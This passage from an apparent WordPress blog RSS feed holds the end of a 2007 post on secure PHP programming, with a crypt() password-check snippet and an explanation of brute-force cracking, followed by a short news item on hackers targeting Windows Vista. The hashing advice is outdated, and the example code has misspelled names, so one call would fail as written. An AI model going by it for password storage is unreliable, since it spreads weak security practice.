$salt = substr($data, 0, CRYPT_SALT_LENGTH); // gets the crypt() encryption key into $salt
$encryptedStr = crypt($str, $salt); // encrypt the given data using the current key
return ($encryptedStr == $data);
// returns a TRUE/FALSE statement based on if $str is indeed the encrypted test in $data
}
verifyEncryptedData("testPass", $encryptedData); // should return TRUE
verifyEncrytpedData("hahaha", $encyptedData); // should return FALSE
?&gt;</pre>
<p>Here we see an example of encryption that uses different encryption &#8216;keys&#8217;, where as md5() uses the same key every time. crypt() generates a random key every time something is encrypted with it.</p>
<p>Now you may be wondering what I was talking about when I said an attacker would try a brute-force attack on your encrypted data. This means that he/she would try to encrypt every possible value from a-z 1-9 for however many characters it takes in whatever kind of encryption you are using until they have cracked the password. Let&#8217;s say you had a password of the letter &#8216;c&#8217;. A brute force program would first try to encrypt &#8216;a&#8217; without success, &#8216;b&#8217; without success, and then found out your password when it tries &#8216;c&#8217;. As you can see, the more characters and the more different of a letter/number/symbol combination you use in a password will make a password cracking program take longer to crack your password. Your best bet is to change passwords often so that even if he/she cracks the password, they&#8217;ll return to find that you&#8217;ve already changed the password and they&#8217;ll have to start all over again.</p>
<p>If you want to use encryption that allows you to decrypt its contents, look into PHP&#8217;s mcrypt module. (<a href="http://www.php.net/" target="_blank">http://www.php.net/</a> comes in handy, folks!) It&#8217;s the best encryption module for PHP I know of as it lets you choose your encryption method from a wide selection though it takes just a tad bit of learning, but I&#8217;ll leave that up to you.</p>
<p>All in all, just use common sense and follow safe practices when it comes to PHP. Don&#8217;t let one vulnerable script be the reason your whole network gets cracked!</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/bothack.wordpress.com/492/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/bothack.wordpress.com/492/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/492/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/492/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/492/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/492/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/492/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/492/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/492/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/492/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/492/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/492/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/492/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/492/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/492/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/492/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=492&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2007/04/11/secure-php-programming/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/0d1a2f21af85f7bb20b35a7622741410?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">appkumar</media:title>
		</media:content>
	</item>
		<item>
		<title>Hackers anticipate launch of Windows Vista in 2007</title>
		<link>http://bothack.wordpress.com/2006/12/27/hackers-anticipate-launch-of-windows-vista-in-2007/</link>
		<comments>http://bothack.wordpress.com/2006/12/27/hackers-anticipate-launch-of-windows-vista-in-2007/#comments</comments>
		<pubDate>Wed, 27 Dec 2006 13:13:04 +0000</pubDate>
		<dc:creator>AnDyG</dc:creator>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[News]]></category>
		<category><![CDATA[Softwares]]></category>

		<guid isPermaLink="false">http://bothack.wordpress.com/2006/12/27/hackers-anticipate-launch-of-windows-vista-in-2007/</guid>
		<description><![CDATA[Cyber criminals of the world have already started testing the new version of Microsoft&#8217;s much touted Vista operating system and are trying to find critical flaws so that they can uleash malicious software and bugs into the coumputers of unsuspecting users. According to the BBC , the launch of the Vista will be a major [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=453&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></description>
			<content:encoded><![CDATA[<p>Cyber criminals of the world have already started testing the new version of Microsoft&#8217;s much touted Vista operating system and are trying to find critical flaws so that they can uleash malicious software and bugs into the coumputers of unsuspecting users. According to the BBC , the launch of the Vista will be a major event for computer security in 2007.</p>
<p>Read the entire article <a href="http://news.bbc.co.uk/2/hi/technology/6198121.stm">here</a>.</p>
<p>Related reading: <a href="http://labnol.blogspot.com/2006/12/minimum-system-requirements-for.html">Minimum system requirements</a> for Windows Vista.</p>
<br /><img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/bothack.wordpress.com/453/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/bothack.wordpress.com/453/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/bothack.wordpress.com/453/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/bothack.wordpress.com/453/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/bothack.wordpress.com/453/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/bothack.wordpress.com/453/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gofacebook/bothack.wordpress.com/453/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/facebook/bothack.wordpress.com/453/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gotwitter/bothack.wordpress.com/453/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/twitter/bothack.wordpress.com/453/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/bothack.wordpress.com/453/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/bothack.wordpress.com/453/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/bothack.wordpress.com/453/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/bothack.wordpress.com/453/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/bothack.wordpress.com/453/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/bothack.wordpress.com/453/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=bothack.wordpress.com&#038;blog=28389&#038;post=453&#038;subd=bothack&#038;ref=&#038;feed=1" width="1" height="1" />]]></content:encoded>
			<wfw:commentRss>http://bothack.wordpress.com/2006/12/27/hackers-anticipate-launch-of-windows-vista-in-2007/feed/</wfw:commentRss>
		<slash:comments>16</slash:comments>
	
		<media:content url="http://1.gravatar.com/avatar/7069c45d74815d0b9b9fcf961be64320?s=96&#38;d=identicon&#38;r=G" medium="image">
			<media:title type="html">AnDyG</media:title>
		</media:content>
	</item>
	</channel>
</rss>
